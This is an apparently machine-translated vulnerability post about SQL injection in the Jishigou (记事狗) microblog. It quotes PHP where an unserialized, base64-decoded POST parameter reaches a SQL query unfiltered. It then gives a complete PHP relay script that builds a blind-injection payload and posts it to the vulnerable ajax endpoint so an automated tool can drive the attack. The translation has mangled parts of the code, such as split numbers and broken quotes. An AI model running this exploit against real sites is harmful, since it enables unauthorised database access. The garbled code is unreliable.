Jishigou (记事狗) microblog, latest version: injection vulnerability - vulnerability warning - the black bar safety net

2012-11-05T00:00:00
ID MYHACK58:62201235418
Type myhack58
Reporter 佚名
Modified 2012-11-05T00:00:00

Description

/modules/ajax/topic.mod.php

function Pic_ajax() {//echo 1 1; //echo base64_encode(serialize(array('a'=>'0\'#'))); $options = array(); $TopicListLogic = Load::logic('topic_list', 1); $per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 2 0; $cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 1 0; $uid = $this->Post['uid'] ? $this->Post['uid'] : "; if($this->Code =='channel'){ $id = $this->Post['id'] ? $this->Post['id'] : "; //get $options = array( 'item'=>'channel', 'item_id' => unserialize(base64_decode($id)),//decoding for Base64, so disregard the Gpc. to. 'perpage' => $per_page_num, ); $info = $TopicListLogic->get_data($options);//a query function which also didn't do any filtering

get_data($param, $caller = "web") .....

$item_ids = $this->_process_param($param['item_id']);//here the assignment $item = trim($param['item']); ..... $where_sql = ($perm_sql ? "AND {$perm_sql}" : "). (isset($param['tid']) ? 'AND tid IN ('. jimplode($tids).') ': "). ($roottids ? 'AND roottid IN ('. jimplode($roottids).') ': "). ($from ? "AND from='{$from}' " : "). ($item_ids ? "AND item_id IN (". jimplode($item_ids).") ": ").// Written statement ($item ? "AND item='{$item}' " : "). (the$content ? "AND content='{$content}' " : "). ($content2 ? "AND content2='{$content2}' " : "). ($filter_sql ? ' and '.$ filter_sql : ");

test

! [](http://www.mcbang.com/data/attachment/portal/201211/05/092237d9qcbswogwdqywdt.jpg.thumb.jpg)

Exploiting this injection by hand is rather troublesome: the result is not echoed back, so only blind injection is possible. So I wrote a relay program and handed it to a tool to run.

<? php $data=base64_encode(serialize(array('a'=>'0\') and 1='.$ _GET[id].'#'))); $flag = 0; $post = "; $errno = "; $errstr = ";

$host='127.0.0.1'; $path='/jsg'; $argv = array( 'id'=>$data, );

foreach ($argv as $key=>$value) { if ($flag!= 0) { $post .= "&"; $flag = 1; } $post.= $key."="; $post.= urlencode($value); $flag = 1; } $length = strlen($post); //Create socket connection $fp = fsockopen("$host",8 0,$errno,$errstr,1 0) or exit($errstr."--->".$ errno); //Construct the post request header $header = "POST {$path}/ajax. php? mod=topic&code=channel HTTP/1.1\r\n"; $header .= "Host: {$host}\r\n"; $header .= "Referer: /flandy/post. php\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: ".$ length."\ r\n"; $header .= "Connection: Close\r\n\r\n"; //Add the post string $header .= $post."\ r\n";

//Send post data fputs($fp,$header); $inheader = 1; while (! feof($fp)) { $line = fgets($fp,1 0 2 4); //Remove the request packet header shows only the page of data returned if ($inheader && ($line == "\n" || $line == "\r\n")) { $inheader = 0; } if ($inheader == 0) { echo $line; } }

fclose($fp);

?>

Once running, the speed is passable.

!